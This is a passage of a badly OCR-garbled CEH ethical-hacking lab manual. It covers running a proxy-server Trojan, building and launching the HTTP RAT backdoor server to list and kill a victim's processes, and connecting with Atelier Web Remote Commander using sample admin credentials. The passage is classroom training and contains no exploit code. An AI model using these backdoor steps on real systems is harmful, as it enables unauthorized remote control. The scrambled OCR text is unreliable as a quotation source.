gnc| process

Physical Mem ory: 43°.c

FIGURE 3.8: MCAFEE in Task manager

Lab An alysis alysis Analyze and document the results related to die lab exercise. Give your opinion 011 your target’s secunty posture and exposure dirough public and free information.

P L E A S E T AL A L K T O Y O U R I N S T R U C T O R I F Y OU OU H A V E Q U E S T I O N S RELATED TO THIS LAB.


I n fo fo rm r m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed

E X E M a ke ke r

O u tp t p u t: t: U si sin g a b a c k d o o r execute Tetris.exe

Questions 1. Use various odie r options for die Op en mode, Copy to, Action sections of OneFileEXEMaker and analyze the results. 2. How Ho w you will will secure your compute com puterr from OneFileE XEM aker attac attacks? ks?

CE H Lab M anual Page 444

Ethica l Ha ckin g and Counterm easures Copyrigh Copyrightt © by EC-Council EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.


Internet Connection Required

□ Yes

0 No

Platform Supported 0 C la l a ss ss rro o om om


0 iLab Labs



Proxy Server Serv er Troja Trojan n A. Trojan is a program that co contains ma malicious or harm harmfful code inside ap apparently harmless programming or data in such such a )ray that that it i t can can get get control and and cause cause damag damage, e, such as minin mining g the file file al allocation table on a hard ard drive. ICON

KEY

P~/ Valuable information Test vom knowledge —

Web exercise

m

Work Wo rkbo book ok rev review

Lab Scenario You are a security security administrator o f your company, and your job responsibili responsibilitie tiess include include protecting the network from Trojans and backdoors, Trojan attacks, attacks, theft o f valuable valuable data from the network, and identity theft. theft.

Lab Objectives The objective objective o f tins tins lab is is to help students learn to detect Trojan and backd oor attacks. The objectives of tins lab include: •

Starting McAfee Proxy

•

Accessing the Interne t using McAfee Proxy

Lab Environment To carry out diis, you need: need:

JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

McAfee Trojan located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans

■

A compu ter running Window Window Server 2012 (host) Windows Server 200 8 runnin g in virtual machine

■

If you decide to dow nload the latest version, then screenshots shown 111 the lab might differ You need a web browser to access Internet Administrative privile privileges ges to m n tools





Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table 011 a hard drive. Note: The versions of the created cclient or host and appearance may differ from

what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab. £

TASK

Proxy server Mca fee

Lab Task Task s 1. In Window s Server 2008 Virtual Machine, navigate navigate to Z:\CEHv8 Module Module 06 Trojans Trojans and Backdoors\Trojans Typ es, and right-click Proxy Server Trojans and select CmdHere from die con text menu. j r a C > Pit

|i■

Edt

* CD -v3 ' teduc05Tro:o ««nd30ccdo0f3 - "rojanaTypes

view

Toos

Orgsncc »

ndp

Vc a s

*

F pi Documents £ Picture* Picture* ^

Mjflic ic •tore

w

S ' s® s® 1 '

Nn • - - C * » n od od r i« i« d M T vp vp # j, Bl*d0«rryT'0)jn J( T'0j*tk ,Jf Canrund 5h*l "rajjin* Jj D*t»c« D*t»c« rw«tT a|arK

M Sat

M

Jf Destruetve Trojans Trojans J t Swoonc Trojans Trojans

»

Folders Mon tor J i Reosrv Mon

_±_

| . Startup P'cgrarr* P'cgrarr* W JA rojansT/pes

3ladd>e ry Trojan | . Comrrand Srel Trt

JtE-f'd JtE-f 'd l r3 :3rs :3rs J k F T i r o jar J t GJ: Trojans JlMTPh-TTFST'Ojans JtlOPBdCWoo j.MACO SXTt oaTS

R=nct c A< J t VMC raja

j. 3ef3Gem ertTro;a•

1 . 3estrjc&'/e “rojor

COer R»stora previOLS versions

J. -banbrgT-qjarts

1.

Ser Serd d To

Trojers

i. '^PT'cjo n

Q it

i . SUIT'ojans SUIT'ojans

C30V

L. - TIP t-rr P5 Tro;a

C eare9xjrtcjt Delete Rename

I, :CKPBdCkdCOr

Proxy Se ver Irojf

Prooenes

Jg \\ 35PtOtv TrQ*

-

. . t in in m i G H

:

►

.

FIGURE 4.1: Windows Server 2008: CmdHere

2. No w typ typee die comman d dir to check for folder contents.

FIGUR E 4.2: Directory listing of Proxy Server folder

3. The Th e following image lists die directories and files files 111 the folder.




-1 | x | Z :\ :\ C E H v8 v8 M o du du le le 0 6 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \ P r o x y S e r v e r T r o j a n s > d i r I U o l u ne ne i n d r i v e Z h a s n o l a b e l . I U o lu lu n e S e r i a l N u m b er er i s 1 6677 77-- 77D DAC I D i r e c t o r y o f Z : \ C E H v8 v8 M o du du l e 0 6 T r o j a n s a n d B a c k d o o r s V T r o j a n s T y p e s \ P r o x y S e r v e Ir Trojans 1 0 9 /1 /1 9 /2 /2 0 1 2 1 0 99// 1 9/ 9/ 2 01 01 2 102/1 7/20 06 109/19/2012

0 1 : 0 7 AM < DI DIR > 0 1 : 0 7 AM < DI DIR > 1 1 : 4 3 AM 5 ,3 2 8 n c a fe e .e x e 0 1 : 0 7 AM < DI DI R> R> W 3 b Pr Pr 0 xxyy T r 0 j 4 n C r 3 4 t 0 r < F u nn nn y N a ne ne > 1 F r iill e <^ ss>; 5b , 3JJ222 8 b y tt eess 3 Dir 208,287 ,793,152 byte s free

Z:\CEHv8 Module 06 Trojans and BackdoorsSTrojans Types\Proxy Server Trojans>—

m

FIGURE 4.3: Contents in Proxy Server folder

Type die command mcafee 8080 to mil the service 111 Windows Server 2008.

FIGURE 4.4: Starting mcafee tool on port 8080

5. The Th e service lias started 011 port 8080. 6. No w go to Windows Server 2012 host machine and contigure the web brow ser to t o access die d ie Inte I nterne rnett 011 port 8080. 7. 111 diis lab launch laun ch Clirome, and select select Settings as shown 111 die following figu figure. re. Q

be m Tliis process can be attained in any browser after setting die LAN settings for die respective browser browser

2 wwwgoogtorofv

* C.pj

lo*r

ico* • O

Google XjnaNCMm-

11-w n• • ... FIGURE 4.5: Internet option of a browser in Windows Server 2012




8. Click the Show advanced settings 1111kto view the Internet settings.

FIGURE 4.6: Advanced Settings of Chrome Browser

9. 111 Network Settings, click Change proxy settings. C I Clvotue Clvotue

0 chrcyncv/dVOflM.'Mttnpt / Settin g s

9« c»rt. VUu) tAdofl 1
4 Enitoir AutaMtc M M l*«Dtom n *u«

Mttmeric Gocgit Owcfnt isw9n«y««»ccmûKrss>S«m

tc connec tc the rctMOrfc.

| OwypwstBnjt-

(UQMthjt w«n>r 1l*nj 1l*nju*9«I w

it Oownoads

0 01

Covmlaadkcabot: C.'lherrAirnncti rt AT T to>
1

U Ast »hw 10 w «Kt!li t Mm dw»«10><«9 MTTPS/SM.

FIGURE 4.7: Changing proxy settings of Chrome Browser

10. 10. 111 die di e Internet Properties window click LAN settings to configure proxy prox y settings.




Internet Properties General [ Security ] Privacy ] Conte nt

Connections | Programs ] Advanced

To set up an Inte rnet connection, dick Setup.

Setup

Dial-up and Virtual Private Network settings

Choose Choose Settings if you need to configure a proxy server for a connection. connection. (•) Never cfal a connection on

O Dial Dial whenever a n etwork connection is not present O Always Always dal my default connectio connection n Current

Sgt default

None

Local Area Netwo rk (LAN) sett ing s ------------------ -----------------------------------LAN Settings do not apply to dial-up connections, Choose Settings above for dial-up settings.

OK

] |

|

LAN setting s

Cancel Cancel J

\

ftpply

FIGURE 4.8 4.8:: LAN Settings Settings of o f a Chrome Browser

11. 111 die di e Local Area Network (LAN) Settings window, select die Use a proxy s erv er for your LAN option 111 the Proxy server section. 12. Ent er die IP address o f Windows Server Server 22008 008,, set die port nu mber to 8080, and click OK. FT

Local Area Network (LAN) Settings

Automatic Automatic configuration configur ation Auto matic conf igura tion may o ver ride manual s ettin gs. To ensu re th e use of manual settings, disable automatic configuration. @ Automatically Automatically detect settings Use automatic configuration script

Address Proxy server Use a proxy server for your LAN (These settings will will not apply to dial-up or VPN connections). Addre ss:

10.0.0.13

Port:

8080

Adv anc ed

I !Bypass prox y serv er for local local addresses! addresses!

OK

Cancel

FIGURE 4.9 4.9:: Proxy settings of LAN in Chrome Browser Browser

13. 13. N ow access access any web page 111 die browser brows er (example: (example: www.bbc.co.uk ))..




FIGUR E 4.1 4.10: 0: Accessing web page using proxy server

14. The Th e web page will open. 15. Now go back to Windows Server 2008 and check die command promp pro mpt. t. A d m in is tr at o r C: \W md ow * \sy *t em 32 \c m d .e x e - m ca fe e 80 80

Accessing web web page m using proxy server

www.google.co : / c o n p l e t e / s e a r c h ? s u g e x p = c h r o m e , n o d = 1 8 & c l i e n t = c h ro ro n e8 e8 r hhll = er er :1 2 0 0 . US8rq=bbc.c US8rq=bbc.c o - | Accepting New Requests ■ w w w . g o o g l e . c o :1 2 0 0 / c o n p le le t e /s /s e a r c h ? su su g e x p = c h r o m e , n o d = 1 8 8 t c l i e n t s c h r o n e 8 r h l = e n l~US&q=bbc.co.u Accepting New Requests ! Accepting New Requests ! A c c e p t i n g Ne w R e q u e ■ * * ^ / c o n p l e t e / s e a r c h ? s u g e x p = c h r o r o e , n o d = 1 8 8 t c l i e n t = c h ro ro n e 8t 8t h l= l= e r l-US&a=bbc.co.uk | / : b b c .c o . u k :1 3 0 1 Hccepting New Kequests ■ Accepting New Requests ■ / :w w w . b b c . c o . u k : 1 2 0 0 Accepting New Requests ! Accepting New Requests■ Accepting New Requests ! Accepting New Requests ! Accepting New Requests ■ Accepting New Requests ! Accepting New Requests ! s t a t i c . b b c i . c o . u k : / fr f r a n e w o r k s / b a r le l e s q u e / 2 . 1 0 . 0 / d e s k t o p / 3 .5 . 5 / s t y le l e / r * a i n .c . c s s :2 0 0 ! Accepting New Requests ■ s t a t i c . b b c i . c o . u k : / b b c d o t c o n / 0 .3 .3 . 1 3 6 / s ty ty l e / 3 p t _ a d s .c . c s s :2 0 0 ! Ac cepting

Ne w R e q u e s t s ! ________ ____________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ________ ____

FIGURE 4.11: Background information on Proxy server

16. You can see diat we had accessed die Internet using die proxy server Trojan.

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s sea rn tv posture and exposure dirough diroug h public and tree information.


Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.


P L E A S E T AL A L K T O YO YO U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S RELATED TO THIS LAB.


I nf nf or or m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed

Proxy Server Trojan

Output: Use the proxy server Trojan to access the Internet Accessed webpage: www.bbc.co.uk

Questions 1. Determine whether McAfee McAfee HTTP Proxy Server Server Trojan supports other ports por ts that tha t are also apart ap art from f rom 8080 8080.. 2. Evaluate the drawbacks of using the HT TP proxy prox y server server Trojan to access access the Internet.

Internet Connection R equired equired 0 Y es

□ No



□ !Labs Labs



HTTP Trojan Tro jan A. Trojan is a program that co contains ma malicious or harm harmfful code inside ap apparently harmless programming or data in such such a iray that that it i t can can get get control and and cause cause damag damage, e, such as minin mining g the file file al allocation table on a hard drive. ICON

/' Valuable information S

Test your ______ ___ _ knowledge ____

*

Lab Scenario

KEY

Web exerc exercise ise

£Q! Workbook Wo rkbook review

Hackers have a variety ot motives for installing malevolent software (malware). This types of software tends to yield instant access to the system to continuously steal various types of information from it, for example, strategic company’s designs 01 numbers o f credit credit cards. cards. A backd oor is a program or a set of related programs that a hacker installs 011 the victim computer to allow access to the system at a later time. A backdoor’s goal is to remove the evidence o f initial initial entry from the systems log. Hac ker—dedicated w ebsites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log 111 by entering a predefined pas sword sw ord . You are a Security Security Adm inistrator o f your company, and your job responsibili responsibilities ties include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives The objective objective of tins lab lab is to to help students learn to detect Trojan and backd oor attacks. H T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

The objectives of the lab include: •

To run HTTP Trojan Trojan 011 Windows Server 2008

•

Access the Windows Server Server 2008 2008 machine process list list using the HTT P Proxy

•

Kill Kill running processes 011 Windows Server 2008 Virtual Machine

Lab Environment To carry out diis, you need: need:




HTTP RAT located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Bac kdo ors\T rojan s T ypes\HTTP HTTPS HTTPS Trojans\HTTP Trojans\HTTP RAT RAT TROJ TROJAN AN

■

Window Server 2008 (host) A compu ter nuining Window

Windows 8 nuniing 111 Virtual Maclune

■

Windows Wind ows Server 2008 111 Virtual Machine

■ If you decide decide to download the the latest version, then screenshots shown 111 the lab might differ ■

You need a web browser to access access Intern et

■

Administrative Admin istrative privileges privileges to m n tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way diat it can get control and cause damage, such as ruining die file allocation table on a hard dnve. Note: The versions of die created client or host and appearance may differ from

what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab.

Lab Task Task s HTTP RAT

1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by hovering die mouse cursor on die lower-left lower-left corner of die desktop,

u

Rtcytlt Dm

a

*

Mo»itla firefox

Google Chremr

Windows 8 Release Previev. Evaluation copy Build 840C

■>8

FIGURE 5.1: Windows 8 Start menu

2. CEH L ab Manual Page 454 454

Click Services ui the Start menu to launch Services. Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


Start

m

Google Chrome

m 9

Video

*

.... 5

Weiner

m

>PP1:1 ■:h e \\" u'.a

services

<3,

rm

■

B

Calendar

Internet Explorer

tfecttop

Uapt

m Wide Web Publisher is mandatory mandat ory as HTTP HTT P RAT runs on port 80

Mozilla Firefox

Slcfe

aS SfcyDrwe

^

_ .

, ,

File

Action

FIGURE 5. 5.2: 2: Windows Windows 8 Start menu Apps _

3. Disable/Stop World Wide Web Publishing Services. View

H«Jp

+ 1H 1H1 Ei a HI 0 a l » Services ;local) World Wide Web Pubfahng Service Nam e 34 W i n d o w s Fi re wal l V/in V/in d cv /s /s Fo n t Cach e Serv Serv ice ice

Description: Provides Web comectr/rty and ad min strato n th ro u g h th e In terret terret Infcrmation Services Manager

Description

Status

S ta ta rt rt up up T yp yp e

W in in d o w s F 1.«

Running

A u to m a t ic

Loc

Op timizes timizes p .... ..

Ru n n in in g

Au to matic matic

Loc

W in in ddo ow wss I m ag ag e A cq cq uuii s it io io . .

P r o vvii de de s im . .

W i n d o w s I n s t a ll e r

A d d s , m o d i .. .

V W in in ddo o ws ws M a n ag ag e me me n t I nnss t.t. . P ro ro vvii de de s a c. c. .

M sn sn uu3 3l R un un nnii ng ng

M e n u sl

Loc

A ut ut om om a titi c

LOC Net

•^W indo ws Media Player Net... Net...

S h a r e s W in ...

M a n ua l

^ W i nd n d oow w s M od od u l e s I n st a ll e r

E n a b l e s in st .. .

M an an u a l

£ $ V/ind V/ind cws Pro cess cess Activ Activ atio atio ...

Th eWin d o ...

£ $ W i n d o w s R e m o t e M a n a g e .. .

W i n d o w s R...

W in in ddo ow wss S e a rc rc h

P rroo vvii d es es CO.-

W in in ddo o ws ws S to to rree Se Se rv rv ic ic e (W5...

Pr oov v id id es es in inf . .

L og og A

Ru n n in in g

Man u al M e n u sl

R un un n in in g

N et

A uutt o ma ma titi c (D._

Loc

M an an uuaa l ( Tn Tn gg... .

LOC

W i n d o w s T im #

M a i n t a i n s d...

M a n u al ( T n g ..

Loc

Q Wi Wi n d o w s U p d a t e

E n a b l e s t h e. e ...

M a n u a l ( T n g .. .

Loc

M a nu nu al al

L oc oc

*% %W W in in HT HT TP TP W eb eb Pr ooxx yA u to to .. W in in HT HT TP TP i . .

R un un nnii ng ng

3% W i r e d A u t o C o n f i g

T h e W i r e d ...

M a n ua l

L0C

'• & WLAN A u t o C o n f i g ■I^WM Performance Adapter

T h e WLANS...

M a n ua l M a n ua l

LOC lo c Nt t

W o rk s t a t i o n P I Wo rld Wid e Web Pu b lnh lnh in ... ... - WWAN AutoConfig

Provide; pe.. C r«a t «c a n d .. .

R un un n i n g

Automatic

Pro vid vid e! W...

Ru n n in in g

Menusl

u M

M a n ua l

LOC v >

T h is se rvi ce . .

<

\ Mended ^Standard/

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World Wide Web Publishing service and select Properties to disable the service.




Wo rld W ide Web Publishing Publishing Service Service Properties (Loc al.. al... Genera Genera1 1 Log Log On Recovery Recovery Depende Dependencies ncies Service name:

W3SVC

Display name:

World Wide Web Publishing Service Servic e ivides Web connectivity and administration )ugh the Internet Information Services Manager

Description:

Path to executable: C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k iissvcs Startup type:

Disabled

Helo me configure service startup options.

Service status:

Stopped Stopped

Start

Stop

Pause

Resume

You can specify the start parameters that apply when you start the service from here Start parameters

OK

Cancel

Apply

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. N ow start HT TP RAT from die location location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP Trojans\HTT P RAT RAT TROJAN. TROJAN.

HTTP RAT 0.31

□

r V 'k H T T P R A T IUUI The T he send notificati notifi cation on option can be used to send the details to your Mail Mail ID

f -W !backdo !backdoor or Web Webse serrver ver

J

by zOmbie ?J

http://freenet.am/~zombie]] latest version here: [http://freenet.am/~zombie settings W

send notification w ith ip address to mail mail

SMTP server 4 sending mail u can specify several servers delimited with ; smtp. mail. mail. ru;$ome. other, smtp. server ; your email address: |[email protected] I.com co m close FireWalls Create

server port: [80" Exit

FIGURE 5.5: HTTP RAT main window

6. Disable die Send notification with ip address to mail option. 7. Click Create to create a httpserver.exe file.




E ll

HTTP RAT 0.31

/VKHTTP RAT

!backdoor Webserver

I

if■• T

J

h

y 20mb 20mbiie

v0.31

.

1 latest version here: [ http://freenet.am/~zombie http://freenet.am/~zombie]]

seiuriys send notification with ip address to mail| SMTP server 4 sending mail u can specify several servers delimited with ; | smtp. mail. mail. ru;some. other, smtp. server; your email address: |y |y [email protected] close FireWalls |i

Create Create

j|

server port: 180

Exit

_

FIGURE 5.6: Create backdoor

HTTP RAT 0.31 0 2 Tlie Tlie creat created ed httpserver will be placed in the tool directory

/V \H TT P RAT

I -W ^backdoor Webserv Webserver er done! la

r

done send http5erver.exe 2 victim

c OK

|y |yo [email protected] w

close FireWalls

server pork:[

Create

Exit

FIGURE 7. : Backdoor server created successfully

8. Tlie httpserver.exe tile should be created 111 die folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP Trojans\HTT P RAT RAT TROJAN TROJAN

9. Double-cli Dou ble-click ck the tile tile to and click click Run.




HTTP RAT TROJAN

Applicatio n Tool* Tool* Mo mg c

BQ New item

IS □ * "

Im-J Co d / path

0 »«te
to*

Clipboard

o®

I

|

|

Open File le

[g j

htlpscfvcr |

□ D Inrert
Security Warning

Na m e

...TTP HTT PS Tro jans \HT TP RAT TR OJA N\ht tpse rvcr .cxc

~ Publisher: Unkn own Publisher

*S&l Rece nt plac es

Type

1 . r e ad ad m e ^

Select aone

The publisher s her could not bp verified. Are you dire you want to run thk software?

Z ittpiat

4 Downloads

E dit

01

N3 me

D es es kt kt op op

EEs ««t «« t >11

S I O p en en 0

to•

« HTTP HTIPS Trojans >

Favorites ■

*

Easy access

Application

From: Z:\CEHv8 Mod ule06 Trojans and Backdoors Jro jan sT

L Lib ibrar raries ies 1111 Doc ume nts

Cancel

Run

Music B

P i ct ct u re re s

g£ Videos ^3.

Ho meg rro oup

This file file docs no t have valid digital signature that verifies its publisher. You should only run software from publishers you trust

HewcanIderidewh ewcanIderidewhattoftivareto toftivaretom mn?

T® Computer i l . Local Local Oslr (C:) (C:) 4- CEH-Tcols (\\10. Ip Admin (admin(admin-p p 4

items

1item selected iO. : KB

FIGURE 5.8: Running the Backdoor

10 10.. G o to Task Manager and check if die process is mnning. File

Options

Processes

View

Performa nce

Ap p histor y

St artup

Users Users

Details

Services 30%

Name

Status

5 2%

4%

0%

CPU

Memory

Disk

1.9%

6.8 MB

0 MB/s

0 Mbps

0%

25.1 MB

0.1 MB /s

0 M bp s

0%

3.3 MB

0 MB/s

0 Mbps

Network

Apps (2) >

Task Manager

> ^

Windows Windows Exp Explor lorer er

Background processes (9) H

Device Device Association on Framework... Framework...

S I Httpserver (32 bit ) Microsoft Windows Search Inde... t f lf ' Print driver host f o r applications m

Snagit (32 bit)

j[ /) Snagit Editor (32 bit) [■ ] Snagit RPC Helper (32 bit) t> OR) Spooler SubSyste m App

0

TechSmit TechSmith h HTML Help Helper Helper (... (...

0%

1.2 MB

0 MB/s

0 Mbps

0%

4.9 MB

0 MB/s

0 Mbps

0%

1.0 MB

0 MB /s

0 Mbps

19.7%

22.4 MB

0.1 MB/s

0 Mbps

0%

19.2 MB

0 MB/s

0 Mbps

1.7%

0.9 MB

0 MB/s

0 Mbps

0%

1.5 MB

0 MB/s

0 Mbps

0%

0.8 MB

0 MB/s

0 Mbps

W i n d o .*;■ . : ( > f f • , ' t - , ~ : (* ) Fewer Fewer details details

FIGURE 5.9: Backdoor running in task manager

11. Go to Windows Server 2008 2008 and ope n a web browser to access die Windows 8 machine (here “10.0.0.12” is die IP address ot Windows 8 Machine).


Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


*Drabe'S KTTP RAT

c | I £« £« iooale

P]

*

D -

welcome 2 IITTP_RAT infected computer }:]

.es] [brov!6«] [brov!6«] [comouter info] [stoo htto rat] [have auaaestions?] auaaestions?] [homeoace] wplrnme }:J

FIGURE 5.10: Access the backdoor in Host web browser

12. Click Click running processes to list the processes runnin g on die d ie Windows 8 machine. Z>nbe' Z>n be'ss HTTP_RAT

1,4■ 1,4■

& 10.0.0. iZproc ___________ ___________

C

? 1 ioojle

P

A

E-

running p rocessez: rocessez: [system Process] Process] S/stem Ikilll srrss.exe [kill]

!] v*‘ninit.exe[M fkilll [ M !] w1nlogon.exe !,killl services.exe services.exe f kill] kass.exe [ki!!] ;vchoctoxQ r < n :vcho5t.exe r!
111

svch ostexe[ e[h jjj]

spoolsv.exe [kilfl svchostexe | kill) svchostexe [kill] d3cHoct.ova f l-illl

MsMpCng.exeIki xeIkill »vc.hus»t.«x« fklin svchostexe [killl 5vchos t.exe [ kiTTj

tackho*!f.®x*» [kill]

t a c U f io c t . o x o [I]!

M p k x a r . t M [ M 1] 1]

searchlndexer.exe fkilfl Snag1t32.exe [joj] TscHelp.exe [kill] S n a g P r i . / . • * * [ k i ll] [I e S n a g it C d it o r . e x dj]

aplmjv164.exeIklll xeIklll]]

svchostexe fktlll httpserver.exe (kill] Taskmor.«»x*

Ik-illl

f ir o f o x O . X O [ U J J ]

FIGURE 5.11: Process list of die victim computer

13. You can kill kill any run running ning processes from here.

Lab An alysis alysis Analyze and document the results related to die lab exercise. Give your opinion on your target’s secuntv posture and exposure dirough public and tree mformadon.




P L E A S E T AL A L K TO T O Y O U R I N S T R U C T O R I F Y O U H A VE VE Q U E S T I O N S RELATED TO THIS LAB.


I n fo fo rm r m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed Successful send httpserver.exe 011 victim machine O utp ut: Kille Killed d Process Process System s111ss.exe csrss.exe

H T T P T r oj o j an an

winlogon.exe serv1ces.exe lsass.exe svchost.exe dwm.exe splwow64.exe httpserver.exe t 1retov.exe

Questions 1. Determine the ports that HTT P proxy server server Trojan uses uses to communicat communicate. e. Internet Connection R equired

□ Yes

0 No N o

Platform Supported

0


Classroom

0

iLabs



Rem Rem ote A cce cc ess Troja Trojans ns Using sing A telie te lierr Web Web Rem Rem ote Comm Com m ande nd er .4 Trojan is a program tha that contains malicious malicious or harm harmful ful cod codee inside inside apparently harmless programming or data in such such a )),ay ay tha th at it it can can get control and and cause cause damage damage,, such as ruinin ruining g the fie fi e allocation table on a har hard drive. ICON

KEY

/ Valuable information y 5 Test your

knowledge TTTTT

Web exercise

m

Workbook review review

Lab Scenario A back door Tro jan is a very dangerous dangerous infection that com promises the integrity integrity of a computer, its data, and the personal information of the users. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. Trojans and backdoors are types of bad-wares; their main purpose is to send and receive data and especially commands through a port to another system. This port can be even a wellknown port such as 80 or an out of the norm ports like 7777. Trojans are most of the time defaced and shown as legitimate and harmless applications to encourage the user to execute them. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.

Lab Objectives JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

The objective objective of tins lab lab is to help students learn to detect Trojan and backdo or attacks. The objectives of tins lab include: •

Gain access access to a remote com puter

•

Acquire sensiti sensitive ve informa tion o f the remote computer

Lab Environment To cany out tins, you need: 1.


Atelier Web Rem ote Comm ander located at D:\CEH-Tools\CEHv 8 Module Module 06 Trojans Trojans and and Backdoors\Trojans Typ es\Rem ote A cc es s Trojans (RAT)\Atelier Web Remote Commander



■

A com puter running Window Window Server 2008 (host) Windows Server 200 3 runn running ing in Virtual Machine

■ If you decide decide to download the the latest version, then screenshots shown 111 the lab might differ ■

You need a web browser to access access Intern et

■

Administrativ Adm inistrativee privileges privileges to ru n tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining the tile allocation table on a hard drive. Note: The versions of the created client or host and appearance may dilfer from

what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab. a*

TA SK

1

Atelier Web Remote Commander

Lab Task Task s 1. Install and launch Atelier Web Rem ote Comm ander (AW (AWRC) 111 Windows Server 2012. 2. To launch Atelier Web Rem ote Comm ander (AWRC (AWRC), ), launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop. u

§

€

3 Wind ows Server Server 2012 2012 s u . t

M V M o m S w v w X V ? D M w C M i d M •

0d E v a lu a t o r c g p t . E u C M . r w* M 13P 1

FIGURE 6.1 6.1:: Windows Server 2012 2012 Start-Desktop

3. Click AW Rem ote Commander P rofessional 111 the Start menu apps.




Administrator A

Start C t n v U c r

T n f c

£

* Took

AW fieoiote Connwn..

4

&

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window o f AWRC will appear as shown 111 the following screenshot. AWRC PRO 9.3.9 File

Tools

Desktop

Help Syclnf o

Netwark lnfo

FJ# Sy*t*fn

Uc*rs *nr. Grocpc

Chat

Tliis toll is is used to gain access to all the information of die Remote Remote system

Progress Report

y, Connect df

Disconnect

0 Request Request ajthonrabor ajthonrabor

ff iy te te sl sln : C

@ dear on iscomect k8psln: 0

Connection Duraton

FIGURE 6.3: Atelier Web Remote Commander main window

5. Inp ut the IP addr ess and Username I Password of the remote computer. 6. 111 tins lab we have used Win dow s Server 2008 (10.0 (10.0.0.13): .0.13): ■ User name: Ad minis trator ■ Password: qwerty@123 Note: The IP addresses addresses and credentia credentials ls might differ 111 your labs

7. Click Connect to access the machine remotely.




FIGURE 6.4: Providing remote computer details

Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

8. T he following screenshots show tha t you will will be accessing accessing the Windows Server 2008 remotely. S File

10.0.0.13 :AWRC PRO 9.3.9 Tools

Desktop

Help Syslnf o

Netwo ridnfb

Fie System

Use's anc Groups

Chat

Internet Explo Explo er windows update

j Notepad

~ *T F V

*29 Monitors *

Remote Host

Progress Report | administrator

W C o n ne ne c t c f

□ Requestajthoniabor

k5yle*I11; 201.94

^

#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

D is is c on on n ec ec t

@ C l ea ea r o n i s c o m e c t k BÎiL BÎ iL 0 .8 7

CumcLiimi Duiaim i: iMinuce, 42 Seco Seconds. nds.

FIGURE 6.5: Remote computer Accessed

9. The Co mm ander is is connected to the the Remote System System.. Click Click tlieSys Info tab to view complete details of the Virtual Machine.




FIGURE 6.6: 6.6: Information of the remote computer

10. Select Networklnfo Path where you can view view network information. S

10.0.0.13: AWRC PRO 9.3.9

File

Iools

Desktop

Help Syslnf o

| Netw oriJn fo

\ ADMINS C$ IPCS


| Ffe System

Use's anc Grocps

\

Ports Safeties

Remark Spe . Remote Admin Spe .. Default share Spe .. Remote IPC

Permissions Max Uses net applica... unlimited not ap pli ca. . unlimited net applica unlimited

Remote Host

Chat

P/Transport Protocols

Current Current Uses

Path

Passwoid not val■ not vali not vaN

Progress Report #16.28.24 Initializing, please wait #16:28:25 Connected to 10 0.0.13

^ e

Connect Conn ect

Request st ajthonrabor ajthonrabor P D Reque Ifiytesln: 250.93

A / Disconn Disconnect ect @ dear on iscomect kSps In: 0.00

Connection Dur aton: 5Minutes, 32 Seconds.

FIGURE 6.7: 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and click Get. 12. 12. Tins tab lists lists the com plete files files ol the C :\ drive o f Win dow s Server 2008.




10.0.0.13: AWRC PRO 9.3.9 file

Iools

Help

Desktop

Syslnf o

contents of

NetworicJnfb

I Fie System I Use's and Groups

Chat

'c:'_______

CIJ SRecycle Bin C l Boot Boot C3 Documents and Settings C□ PerfLogs D Program Files (x86) (x86) □ Program Program Files C l ProgramData ProgramData D System Volume u me Inform... Inform... □ U se se rs rs □ Window Windowss File System:

NTFS

Type Type

Serial Number: Number:

6C27-CD39

Labei:

Fixed

Capacity:

17,177,767.936 bytes

Free space:

6.505.771.008 bytes

Progress Report | administrator ^

cf

